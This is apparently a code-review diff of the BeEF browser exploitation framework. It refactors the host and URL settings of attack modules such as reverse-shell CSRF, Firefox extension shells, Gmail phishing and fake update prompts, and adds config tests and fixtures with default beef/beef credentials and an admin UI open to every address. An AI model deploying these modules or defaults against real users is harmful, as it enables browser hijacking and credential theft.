lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},

View File

@@ -6,7 +6,7 @@
class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},

View File

@@ -10,7 +10,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
lhost = @configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'},

View File

@@ -6,11 +6,8 @@
class Hook_microsoft_edge < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
hook_uri = "#{proto}://#{beef_host}:#{beef_port}/demos/plain.html"
configuration = BeEF::Core::Configuration.instance
hook_uri = "#{configuration.beef_url_str}/demos/plain.html"
return [
{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },

View File

@@ -7,7 +7,7 @@ class Dns_tunnel < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },

View File

@@ -11,7 +11,7 @@ class Irc_nat_pinning < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},

View File

@@ -11,10 +11,10 @@ class Phonegap_persistence < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
hook_file = @configuration.get("beef.http.hook_file")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_file = @configuration.hook_file_path
return [{
'name' => 'hook_url',

View File

@@ -8,9 +8,9 @@ class Clickjacking < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/clickjacking/clickjack_victim.html"
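Review bot: `base_host` is still assembled by hand from `beef_proto`, `beef_host` and `beef_port` in this hunk, although the same commit introduces `beef_url_str` and already uses it in the Hook_microsoft_edge and Hta_powershell hunks. Assigning `base_host = @configuration.beef_url_str` would remove three lines and keep URL construction in one place. The same applies to the other modules in this commit that build `base_host` or `url` from the three getters.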

View File

@@ -14,9 +14,9 @@ class Clippy < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

View File

@@ -13,9 +13,9 @@ class Fake_flash_update < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
image = "#{base_host}/adobe/flash_update.png"

View File

@@ -7,9 +7,9 @@ class Fake_notification_c < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

View File

@@ -7,9 +7,9 @@ class Fake_notification_ff < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
proto = @configuration.beef_proto
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
beef_port = @configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}/api/ipec/ff_extension"
return [
{'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
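Review bot: the `beef_host` assignment in this hunk still reads `beef.http.public` directly, while `proto` and `beef_port` next to it move to the new getters. With the nested `public:` block (host, port, https) used by the new configuration, `get("beef.http.public")` would return the whole block rather than a hostname, so `url` would be built from the wrong value. Use `beef_host = @configuration.beef_host`, as the Fake_notification_c and Fake_notification_ie hunks do.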

View File

@@ -7,9 +7,9 @@ class Fake_notification_ie < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [

View File

@@ -72,7 +72,7 @@ class Firefox_extension_bindshell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

View File

@@ -82,9 +82,9 @@ class Firefox_extension_dropper < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},

View File

@@ -75,7 +75,7 @@ class Firefox_extension_reverse_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_host = @configuration.beef_host
return [
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},

View File

@@ -7,9 +7,9 @@ class Gmail_phishing < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
xss_hook_url = "#{base_host}/demos/basic.html"

View File

@@ -4,25 +4,17 @@
# See the file 'doc/COPYING' for copying permission
#
class Hta_powershell < BeEF::Core::Command
def self.options
@config = BeEF::Core::Configuration.instance
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
base_host = "#{proto}://#{beef_host}:#{beef_port}"
ps_url = @configuration.get('beef.extension.social_engineering.powershell.powershell_handler_url')
return [
{'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "#{base_host}" },
{'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => "#{ps_url}"}
[
{ 'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => @configuration.beef_url_str },
{ 'name' => 'ps_url', 'ui_label' => 'Powershell/HTA handler', 'value' => ps_url }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

View File

@@ -7,9 +7,9 @@ class Pretty_theft < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
logo_uri = "#{base_host}/ui/media/images/beef.png"
return [

View File

@@ -7,9 +7,9 @@ class Replace_video_fake_plugin < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
proto = configuration.beef_proto
beef_host = configuration.beef_host
beef_port = configuration.beef_port
url = "#{proto}://#{beef_host}:#{beef_port}"
return [
{'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},

2
package-lock.json generated
View File

@@ -1,5 +1,5 @@
{
"name": "BeEF",
"version": "0.5.1.0",
"version": "0.5.2.0",
"lockfileVersion": 1
}

View File

@@ -1,6 +1,6 @@
{
"name": "BeEF",
"version": "0.5.1.0",
"version": "0.5.2.0",
"description": "The Browser Exploitation Framework Project",
"scripts": {
"docs": "./node_modules/.bin/jsdoc -c conf.json"
@@ -9,7 +9,7 @@
"license": "GNU General Public License v2.0",
"devDependencies": {
"jsdoc": "^3.6.4",
"jsdoc-to-markdown": "^6.0.1"
"jsdoc-to-markdown": "^7.0.1"
},
"dependencies": {}
}
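Review bot: `jsdoc-to-markdown` crosses a major version here (`^6.0.1` to `^7.0.1`), but the package-lock.json hunk above shows a five-line lockfile with no dependency entries, so nothing pins what the docs build actually resolves. Regenerate the lockfile with the dev dependencies installed and commit it alongside this bump, so the resolved tree is reviewable and reproducible.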

View File

@@ -0,0 +1,10 @@
RSpec.describe 'BeEF Command class testing' do
it 'should return a beef configuration variable' do
BeEF::Modules.load
command_mock = BeEF::Core::Command.new('test_get_variable')
expect(command_mock.config.beef_host).to eq('0.0.0.0')
require 'modules/browser/hooked_domain/get_page_links/module'
gpl = Get_page_links.new('test_get_variable')
expect(gpl.config.beef_host).to eq('0.0.0.0')
end
end
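Review bot: both expectations compare `beef_host` to the literal '0.0.0.0', which holds only while the configuration loaded for the test run has no public host and keeps the default bind address. Compare against `BeEF::Core::Configuration.instance.beef_host`, or set the value inside the example, so the spec checks that `config` exposes the configuration helper rather than checking one particular config file.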

View File

@@ -0,0 +1,257 @@
RSpec.configure do |config|
config.before(:context, :type => :old ) do
config = File.expand_path('../../../support/assets/config_old.yaml', __dir__)
@config_instance = BeEF::Core::Configuration.new(config)
end
config.before(:context) do
config = File.expand_path('../../../support/assets/config_new.yaml', __dir__)
@config_instance = BeEF::Core::Configuration.new(config)
end
end
RSpec.describe 'BeEF Configuration' do
context 'configuration validation', :type => :old do
it 'should error when using hold public config' do
@config_instance.set('beef.http.public', 'example.com')
expect(@config_instance.validate).to eq(nil)
end
it 'should error when using old public_port config' do
@config_instance.set('beef.http.public_port', 443)
expect(@config_instance.validate).to eq(nil)
end
end
context 'http local host configuration values' do
it 'should set the local host value to 0.0.0.0' do
@config_instance.set('beef.http.host', '0.0.0.0')
expect(@config_instance.get('beef.http.host')).to eq('0.0.0.0')
end
it 'should get the local host value' do
@config_instance.set('beef.http.host', '0.0.0.0')
expect(@config_instance.local_host).to eq('0.0.0.0')
end
it 'should get the default host value' do
@config_instance.set('beef.http.host', nil)
expect(@config_instance.get('beef.http.host')).to eq(nil)
expect(@config_instance.local_host).to eq('0.0.0.0')
end
end
context 'http local port configuration values' do
it 'should set the local port value to 3000' do
@config_instance.set('beef.http.port', '3000')
expect(@config_instance.get('beef.http.port')).to eq('3000')
end
it 'should get the local port value' do
@config_instance.set('beef.http.port', '3000')
expect(@config_instance.local_port).to eq('3000')
end
it 'should get the default port value' do
@config_instance.set('beef.http.port', nil)
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.local_port).to eq('3000')
end
end
context 'beef https enabled configuration values' do
it 'should set the https enabled config value' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
end
it 'should get https enabled value set to true' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.local_https_enabled).to eq(true)
end
it 'should get https enabled value set to false' do
@config_instance.set('beef.http.https.enable', false)
expect(@config_instance.local_https_enabled).to eq(false)
end
it 'should get the default https enabled value' do
@config_instance.set('beef.http.https.enable', nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(nil)
expect(@config_instance.local_https_enabled).to eq(false)
end
end
#public
context 'http public host configuration values' do
it 'should set the public host value to example.com' do
@config_instance.set('beef.http.public.host', 'example.com')
expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
end
it 'should get the public host value' do
@config_instance.set('beef.http.public.host', 'example.com')
expect(@config_instance.public_host).to eq('example.com')
end
it 'should get nil host value' do
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.public_host).to eq(nil)
end
end
context 'http public port configuration values' do
it 'should set the public port value to 3000' do
@config_instance.set('beef.http.public.port', '443')
expect(@config_instance.get('beef.http.public.port')).to eq('443')
end
it 'should get the public port value' do
@config_instance.set('beef.http.public.port', '3000')
expect(@config_instance.public_port).to eq('3000')
end
it 'should return 80 as the port given a public host has been set and https disabled' do
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beef.http.public.host', 'example.com')
@config_instance.set('beef.http.public.https', false)
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.get('beef.http.public.host')).to eq('example.com')
expect(@config_instance.public_port).to eq('80')
end
end
context 'beef https enabled configuration values' do
it 'should set the https enabled config value' do
@config_instance.set('beef.http.https.enable', true)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
end
it 'should get https enabled value set to true' do
@config_instance.set('beef.http.public.https', true)
expect(@config_instance.public_https_enabled?).to eq(true)
end
it 'should get https enabled value set to false' do
@config_instance.set('beef.http.public.https', false)
expect(@config_instance.public_https_enabled?).to eq(false)
end
it 'should get the default https to false' do
@config_instance.set('beef.http.public.https', nil)
expect(@config_instance.get('beef.http.public.https')).to eq(nil)
expect(@config_instance.public_https_enabled?).to eq(false)
end
it 'should return public port as 443 if public https is enabled' do
@config_instance.set('beef.http.public.https', true)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.public.https')).to eq(true)
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.public_https_enabled?).to eq(true)
expect(@config_instance.public_port).to eq('443')
end
end
context 'beef hosting information' do
it 'should return the local host value because a public has not been set' do
@config_instance.set('beef.http.host', 'asdqwe')
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.beef_host).to eq('asdqwe')
end
it 'should return the public host value because a public has been set' do
@config_instance.set('beef.http.host', 'asdqwe')
@config_instance.set('beef.http.public.host', 'poilkj')
expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
expect(@config_instance.get('beef.http.public.host')).to eq('poilkj')
expect(@config_instance.beef_host).to eq('poilkj')
end
it 'should return the local port value because a public value has not been set' do
@config_instance.set('beef.http.port', '3000')
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beef.http.public.https', nil)
expect(@config_instance.get('beef.http.port')).to eq('3000')
expect(@config_instance.get('beef.http.public.port')).to eq(nil)
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.get('beef.http.public.https')).to eq(nil)
expect(@config_instance.beef_port).to eq('3000')
end
it 'should return the public host value because a public has been set' do
@config_instance.set('beef.http.port', '3000')
@config_instance.set('beef.http.public.port', '80')
@config_instance.set('beef.http.public.host', nil)
expect(@config_instance.get('beef.http.port')).to eq('3000')
expect(@config_instance.get('beef.http.public.port')).to eq('80')
expect(@config_instance.get('beef.http.public.host')).to eq(nil)
expect(@config_instance.beef_port).to eq('80')
end
it 'should return a protocol https if https public has been enabled and public host is set' do
@config_instance.set('beef.http.public.https', true)
@config_instance.set('beef.http.public.host', 'public')
expect(@config_instance.get('beef.http.public.https')).to eq(true)
expect(@config_instance.beef_proto).to eq('https')
end
it 'should return a protocol http if public is not set and https local is fales' do
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.https.enable', false)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_proto).to eq('http')
end
it 'should return the full url string for beef local http and port 80' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', '80')
@config_instance.set('beef.http.https.enable', false)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq('80')
expect(@config_instance.get('beef.http.https.enable')).to eq(false)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_url_str).to eq('http://localhost:80')
end
it 'should return the full url string for beef https localhost 3000 default' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', nil)
@config_instance.set('beef.http.https.enable', true)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
end
it 'should return the full url string for beef hook url' do
@config_instance.set('beef.http.host', 'localhost')
@config_instance.set('beef.http.port', nil)
@config_instance.set('beef.http.https.enable', true)
@config_instance.set('beef.http.public.https', false)
@config_instance.set('beef.http.public.host', nil)
@config_instance.set('beef.http.public.port', nil)
@config_instance.set('beeg.http.hook_file', '/hook.js')
expect(@config_instance.get('beef.http.host')).to eq('localhost')
expect(@config_instance.get('beef.http.port')).to eq(nil)
expect(@config_instance.get('beef.http.https.enable')).to eq(true)
expect(@config_instance.get('beef.http.public.https')).to eq(false)
expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js')
end
end
end
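Review bot: the hook URL example sets `'beeg.http.hook_file'` (typo for `beef`), so the following `get('beef.http.hook_file')` expectation passes only because the fixture already contains '/hook.js' and the set call tests nothing. Two further points in this file: the second `config.before(:context)` has no metadata filter, so it also runs for the `:type => :old` context and reassigns `@config_instance`, which leaves it to hook order which fixture the old-config examples see; and those two examples are described as 'should error' while asserting `validate` equals nil, so either the description or the expected value should say what an invalid config returns. The descriptions 'hold public config' and 'public port value to 3000' (which sets '443') also need correcting.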

View File

@@ -0,0 +1,162 @@
#
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.1.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
# Public settings
# These settings will be used to create a public facing URL
# This public facing URL will be used for all hook related calls
public:
host: "example.com"
port: 443
https: true # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
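Review bot: this fixture sets `public.https: true` under `http:` and also keeps `public_enabled: false` under `https:`, two settings for the same question that disagree with each other. The spec reads only `beef.http.public.https`, so drop `public_enabled` or state which one wins. The trailing comment on `https: true` ('public hostname/IP address') belongs to `host`, the certificate comment still refers to `beef.http.public` rather than `beef.http.public.host`, and the commented-out `#public:` and `#public_port:` lines are leftovers of the old format that should be removed from the new-format fixture.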

View File

@@ -0,0 +1,155 @@
#
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.5.1.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
# NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
# by altering the X-FORWARDED-FOR ip address in the request header.
allow_reverse_proxy: false
#public: "example" # public hostname/IP address
#public_port: "" # public port (experimental)
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# Enabled this config setting if you're external facing uri is using https
public_enabled: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
geoip:
enable: true
database: '/opt/GeoIP/GeoLite2-City.mmdb'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
